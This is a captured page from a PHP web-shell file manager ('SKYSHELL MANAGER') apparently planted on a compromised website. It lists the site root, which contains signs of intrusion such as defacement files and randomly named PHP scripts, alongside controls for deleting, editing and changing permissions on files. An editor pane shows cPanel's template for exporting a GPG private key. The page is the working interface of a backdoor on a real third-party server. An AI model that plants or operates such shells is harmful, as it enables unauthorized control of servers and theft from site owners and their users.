📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: editpkey.html.tt
[% SET CPANEL.CPVAR.dprefix="../" %] [% SET export_key_call = execute("GPG", "export_secret_key", { "key_id" => RAW_FORM.key, "passphrase" => RAW_FORM.passphrase }); SET export_key = ""; IF export_key_call.status; SET export_key = export_key_call.data.key_data; END; %] [% js_code = PROCESS js_block %] [% WRAPPER '_assets/master.html.tt' app_key = 'encryption' page_js = js_code embed_stylesheets = [ 'gpg/editpkey.css' ] %] <div class="body-content"> <div class="section"> [% IF export_key_call.status %] <div class="form-group"> <label id="lblPrivateKey"> [% locale.maketext("Private Key") %] </label> <div class="row"> <div class="col-xs-12 col-lg-6"> <textarea id="txtPrivateKey" cols="80" class="form-control" rows="10" readonly>[% export_key %]</textarea> </div> </div> </div> [% ELSIF export_key_call.data.type == 'Cpanel::Exception::GPG::PassphraseRequired' || export_key_call.data.type == 'Cpanel::Exception::GPG::IncorrectPassphrase' %] <div class="row"> <div class="col-xs-12 col-sm-8 col-md-6"> [% IF export_key_call.data.type == 'Cpanel::Exception::GPG::IncorrectPassphrase' %] <div> <div class="alert alert-danger" role="alert"> <span class="glyphicon glyphicon-remove-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title"> [% locale.maketext('Error:') %] </strong> <span class="alert-body"> <span id="incorrectPassphrase"> [% locale.maketext('You entered an incorrect passphrase. Please try again.') %] </span> </span> </div> </div> </div> [% END %] <form method="post" id="frmPassphrase"> <div class="form-group"> <div class="row"> <div class="col-xs-12"> <label id="lblPassphrase"> [% locale.maketext('Please enter the passphrase for the key “[_1]”.', FORM.key) %] </label> </div> </div> <div class="row"> <div class="col-xs-12"> <input name="passphrase" type="password" class="form-control" id="pwdPassphrase"> </div> </div> <div class="row"> <div class="col-xs-12"> <ul class="validation-container hidden" role="alert" id="pwdPassphraseErrorPanel"> <li class="validation validation-error"> <i class="fas fa-exclamation-circle" aria-hidden="true"></i> <span id="pwdPassphraseErrorPanelRequired" class="validation-message"> <span> [% locale.maketext('You must enter a passphrase.') %] </span> </span> </li> </ul> </div> </div> </div> <button type="submit" class="btn btn-primary" id="btnPassphraseSubmit"> <i class="fas fa-sync fa-fw fa-spin hidden" aria-hidden="true" id="btnPassphraseSubmitSpinner"></i> [% locale.maketext('Submit') %] </button> </form> </div> </div> [% ELSE %] <div class="col-xs-12 col-sm-8 col-md-6"> <div class="alert alert-danger" role="alert"> <span class="glyphicon glyphicon-remove-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title"> [% locale.maketext('Error:') %] </strong> <span class="alert-body"> <span id="loadError"> [% locale.maketext('The key failed to load due to an error: [_1]', export_key_call.errors.0) %] </span> </span> </div> </div> </div> [% END %] </div> [% INCLUDE _assets/return_link.html.tt return_location="index.html" return_link_text=locale.maketext("Go Back" ) %] </div> [% END %] [% BLOCK js_block %] <script type="text/javascript"> document.addEventListener("DOMContentLoaded", function(event) { var txtarea = document.getElementById("txtPrivateKey"); if (txtarea) { txtarea.addEventListener("click", function (e) { e.target.select(); }); } var passphraseForm = document.getElementById("frmPassphrase"); var passphraseInput = document.getElementById("pwdPassphrase"); var validationContainer = document.getElementById("pwdPassphraseErrorPanel"); if(!passphraseInput || !validationContainer || !passphraseForm) { return; } passphraseInput.addEventListener("input", _validatePassphrase); passphraseInput.addEventListener("change", _validatePassphrase); passphraseInput.addEventListener("blur", _validatePassphrase); function _validatePassphrase(e) { if(passphraseInput.value) { passphraseInput.dataset.valid = "1"; validationContainer.classList.add("hidden"); } else { delete passphraseInput.dataset.valid; validationContainer.classList.remove("hidden"); } } passphraseForm.addEventListener("submit", function(e) { _validatePassphrase(e); if( !passphraseInput.dataset.valid ) { e.preventDefault(); return; } var spinner = document.getElementById("btnPassphraseSubmitSpinner"); spinner.classList.remove("hidden"); var submitButton = document.getElementById("btnPassphraseSubmit"); submitButton.setAttribute("disabled", true); }); }); </script> [% END %]
Save